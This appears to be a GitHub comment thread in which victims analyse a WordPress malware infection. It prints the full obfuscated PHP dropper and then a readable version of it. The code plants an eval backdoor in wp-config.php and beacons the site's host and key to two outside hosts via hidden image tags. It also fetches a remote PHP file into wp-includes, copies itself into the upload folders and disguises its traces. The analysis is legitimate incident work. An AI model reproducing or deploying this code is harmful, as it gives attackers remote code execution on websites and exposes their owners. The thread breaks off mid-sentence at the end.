$GLOBALS['_253401169_'] = Array(base64_decode('dXJsZW5jb' .'2' .'Rl'),base64_decode('YmFzZT' .'Y0X2' .'Vu' .'Y29kZQ=='),base64_decode('ZmdldGN' .'zdg' .'=' .'='),base64_decode('c2Vz' .'c2' .'lvbl9' .'pZA=='),base64_decode('c3R' .'yX' .'3Jlc' .'GxhY2U='),base64_decode('c2h1ZmZsZQ=='),base64_decode('c' .'3Ry' .'cG' .'9z'),base64_decode('Zm' .'ls' .'ZV9leGlzdH' .'M='),base64_decode('cmVuYW1l'),base64_decode('bXR' .'fcmFuZA=='),base64_decode('cHJpbnRfcg=='),base64_decode('ZmlsZV' .'9l' .'eGlzd' .'HM='),base64_decode('c3Vic' .'3Ry'),base64_decode('c3R' .'yX3NodW' .'Zm' .'bGU='),base64_decode('c' .'3RyX3JlcGV' .'hdA=='),base64_decode('bWQ1'),base64_decode('ZmlsZV' .'9wdXRfY2' .'9' .'udGVud' .'HM='),base64_decode('c' .'3RyX3JlcG' .'xhY2U='),base64_decode('Z' .'mlsZ' .'V9n' .'ZXRfY29udGVudHM' .'='),base64_decode('c3RycG9' .'z'),base64_decode('c3Vic' .'3RyX3Jlc' .'GxhY2U='),base64_decode('aXN' .'f' .'YXJ' .'yYXk='),base64_decode('c3Ry' .'cn' .'Bvcw=='),base64_decode('Y29w' .'eQ=='),base64_decode('Y29weQ=='),base64_decode('b' .'X' .'Rf' .'cm' .'FuZA=='),base64_decode('c' .'2hh' .'MQ=='),base64_decode('Y29' .'w' .'eQ=='),base64_decode('' .'ZmlsZV9' .'wd' .'X' .'R' .'fY2' .'9' .'ud' .'GVudHM' .'='),base64_decode('Z' .'mlsZV' .'9' .'wdX' .'R' .'fY' .'29' .'udGVudH' .'M='),base64_decode('YXJyY' .'Xlfc3Vt'),base64_decode('ZGly'));
function _1045629339($i){
$a=Array('aH' .'R0c' .'DovLzEzO' .'C4xMj' .'guM' .'TY5LjIxO' .'S9zY3J' .'l' .'ZW5zaG90cy8uaW1hZ2VzL2luZ' .'GV4' .'LnBocA==','' .'aH' .'R0cDovL2tpdDRhbGwu' .'cnUvY2' .'9tcG9u' .'Z' .'W50cy9jb21' .'famNlL2luZG' .'V4LnBocA==','d' .'3AtY29udGV' .'udC9wbHV' .'naW5' .'zL2' .'lu' .'ZGV4L' .'nB' .'o' .'cA==','','UkVR' .'VU' .'VTVF' .'9VUkk' .'=','SF' .'RUUF' .'9IT1NU','fA==','PGltZyB3a' .'WR0aD0xIGhlaWdodD0xI' .'HNyYz0i','P2RhdGE' .'9','I' .'j4=','d' .'WZo' .'cGJlZG' .'J3' .'ZXhh','Zm' .'16','Li4vL' .'i4vd' .'3' .'AtY29tbWVu' .'dHMt' .'cG9zd' .'C5' .'waH' .'A=','Li4vL' .'i4v' .'d' .'3AtY29tbW5' .'ld' .'HMt' .'cG9z' .'dC5w' .'aHA=','' .'Li4vLi4v' .'d' .'3' .'AtY29uZmln' .'LnBocA==','QU' .'J' .'DREVGR' .'0hJSk' .'tMT' .'U' .'5' .'PU' .'F' .'FSU1RVVl' .'dYWVph' .'YmNkZWZnaGlqa2x' .'tbm' .'9wc' .'XJzdHV2' .'d3h5eg==','JHRhY' .'mx' .'l' .'X3ByZWZp' .'eA==','d2' .'Nvb2Fkb3RqaXF' .'1a2JkcWx' .'uZQ==','bHo=','a' .'HR' .'0cDovL2R' .'h' .'c' .'GNo' .'ZW1' .'lbm' .'cub' .'3Jn' .'LzEv' .'YXIvd2tzb25ldy' .'5' .'wa' .'H' .'A' .'=','Li4vLi4' .'vd3AtaW5j' .'bH' .'Vk' .'ZXMvdGVtcGxhd' .'GUtd3Bs' .'b2FkZXIucG' .'hw','' .'aW5kZ' .'Xg' .'ucG' .'hw','Li' .'4' .'v' .'dXBncm' .'F' .'k' .'ZS91cGdyYWR' .'lc' .'y5waH' .'A=','aW5kZXgucGh' .'w','L' .'i' .'4' .'vdXBsb2Fkcy93cC11' .'cGx' .'v' .'YWRzLnBocA' .'==','a' .'Q=' .'=','a' .'W5kZ' .'XgucGhw','' .'PD' .'9w' .'a' .'HANCi8v' .'IFNpb' .'G' .'VuY' .'2Ug' .'a' .'X' .'MgZ29sZGVuLg0KP' .'z' .'4=','Li4vd' .'XBsb2Fkcy9p' .'bm' .'Rl' .'e' .'C' .'5waHA' .'=','' .'aW5kZ' .'Xgu' .'cGhw');
return base64_decode($a[$i]);
}
function l__0($_0){
return $GLOBALS['_253401169_'][0]($GLOBALS['_253401169_'][1](~$_0));
}
function l__1($_1){
$_2[]=_1045629339(0);
while(round(0+1428.66666667+1428.66666667+1428.66666667)-round(0+4286))$GLOBALS['_253401169_'][2]($_SERVER);
$_2[]=_1045629339(1);
while(round(0+1379.5+1379.5)-round(0+1379.5+1379.5))$GLOBALS['_253401169_'][3]($_1,$_3);
$_3=$GLOBALS['_253401169_'][4](_1045629339(2),_1045629339(3),$_SERVER[_1045629339(4)]);
$_4=l__0($_SERVER[_1045629339(5)] .$_3 ._1045629339(6) .$_1);
$GLOBALS['_253401169_'][5]($_2);
foreach($_2 as $_5){
echo _1045629339(7) .$_5 ._1045629339(8) .$_4 ._1045629339(9);
if($GLOBALS['_253401169_'][6](_1045629339(10),_1045629339(11))!==false)$GLOBALS['_253401169_'][7]($_SERVER,$_SERVER,$_6);
}
}
@$GLOBALS['_253401169_'][8](_1045629339(12),_1045629339(13));
$_6=_1045629339(14);
if(round(0+937.4+937.4+937.4+937.4+937.4)<$GLOBALS['_253401169_'][9](round(0+410+410+410+410),round(0+1014+1014+1014)))$GLOBALS['_253401169_'][10]($_1);
if($GLOBALS['_253401169_'][11]($_6)){
$_1=$GLOBALS['_253401169_'][12]($GLOBALS['_253401169_'][13]($GLOBALS['_253401169_'][14](_1045629339(15),round(0+16))),round(0),round(0+16));
$_7=$GLOBALS['_253401169_'][15]($_1);
$_5="error_reporting(0);if(isset(\$_REQUEST['wpspm']) && md5(\$_REQUEST['wpspm']) == '$_7' && isset(\$_REQUEST['wprk'])) eval ( base64_decode (\$_REQUEST['wprk']));";
$GLOBALS['_253401169_'][16]("$_6",$GLOBALS['_253401169_'][17](_1045629339(16),"$_5 \n \$table_prefix",$GLOBALS['_253401169_'][18]($_6)));
if($GLOBALS['_253401169_'][19](_1045629339(17),_1045629339(18))!==false)$GLOBALS['_253401169_'][20]($_5,$_0,$_2);
}
l__1($_1);
if((round(0+432.8+432.8+432.8+432.8+432.8)+round(0+1218+1218+1218+1218))>round(0+541+541+541+541)|| $GLOBALS['_253401169_'][21]($_4,$_3,$_6,$_SERVER)); else {
$GLOBALS['_253401169_'][22]($_SERVER);
}
@$GLOBALS['_253401169_'][23](_1045629339(19),_1045629339(20));
$$_6=__FILE__;
@$GLOBALS['_253401169_'][24](_1045629339(21),_1045629339(22));
if(round(0+2883+2883+2883)<$GLOBALS['_253401169_'][25](round(0+2100.5+2100.5),round(0+2221.5+2221.5)))$GLOBALS['_253401169_'][26]($_7,$_5);
@$GLOBALS['_253401169_'][27](_1045629339(23),_1045629339(24));
$_8=_1045629339(25);
@$GLOBALS['_253401169_'][28](_1045629339(26),_1045629339(27));
@$GLOBALS['_253401169_'][29](_1045629339(28),_1045629339(29));
if((round(0+2876)^round(0+958.666666667+958.666666667+958.666666667))&& $GLOBALS['_253401169_'][30]($_3,$_4,$_4))$GLOBALS['_253401169_'][31]($_4,$_0,$_3,$_3);
echo"192485097bc8a240a96aca5968eae777";
?>
I ended up getting hit by the same thing -- didn't notice until recently because the second half of the attack didn't take hold. I took a slightly different approach in reversal though, simplifying all the round(...) calls, and flattening the $GLOBALS and _1045629339 calls:
<?php
function l__0($_0)
{
return urlencode(base64_encode(~$_0));
}
function l__1($_1)
{
$_2[] = 'http://138.128.169.219/screenshots/.images/index.php';
while (0)
fgetcsv($_SERVER);
$_2[] = 'http://kit4all.ru/components/com_jce/index.php';
while (0)
session_id($_1, $_3);
$_3 = str_replace('wp-content/plugins/index.php', '', $_SERVER['REQUEST_URI']);
$_4 = l__0($_SERVER['HTTP_HOST'] . $_3 . '|' . $_1);
shuffle($_2);
foreach ($_2 as $_5) {
echo '<img width=1 height=1 src="' . $_5 . '?data=' . $_4 . '">';
if (strpos('ufhpbedbwexa', 'fmz') !== false)
file_exists($_SERVER, $_SERVER, $_6);
}
}
@rename('../../wp-comments-post.php', '../../wp-commnets-post.php');
$_6 = '../../wp-config.php';
if (file_exists($_6)) {
$_1 = substr(str_shuffle(str_repeat('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', 16)), 0, 16);
$_7 = md5($_1);
$_5 = "error_reporting(0);if(isset(\$_REQUEST['wpspm']) && md5(\$_REQUEST['wpspm']) == '$_7' && isset(\$_REQUEST['wprk'])) eval ( base64_decode (\$_REQUEST['wprk']));";
file_put_contents("$_6", str_replace('$table_prefix', "$_5 \n \$table_prefix", file_get_contents($_6)));
if (strpos('wcooadotjiqukbdqlne', 'lz') !== false)
substr_replace($_5, $_0, $_2);
}
l__1($_1);
@copy('http://dapchemeng.org/1/ar/wksonew.php', '../../wp-includes/template-wploader.php');
$$_6 = __FILE__;
@copy('index.php', '../upgrade/upgrades.php');
@copy('index.php', '../uploads/wp-uploads.php');
$_8 = 'i';
@file_put_contents('index.php', '<?php\n// Silence is golden.\n?>');
@file_put_contents('../uploads/index.php', 'index.php');
if (0 && array_sum($_3, $_4, $_4))
dir($_4, $_0, $_3, $_3);
echo "192485097bc8a240a96aca5968eae777";
?>Thanks for posting, it was nice to see someone else's approach
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Stripping the line breaks (and eval, etc) from the above gives: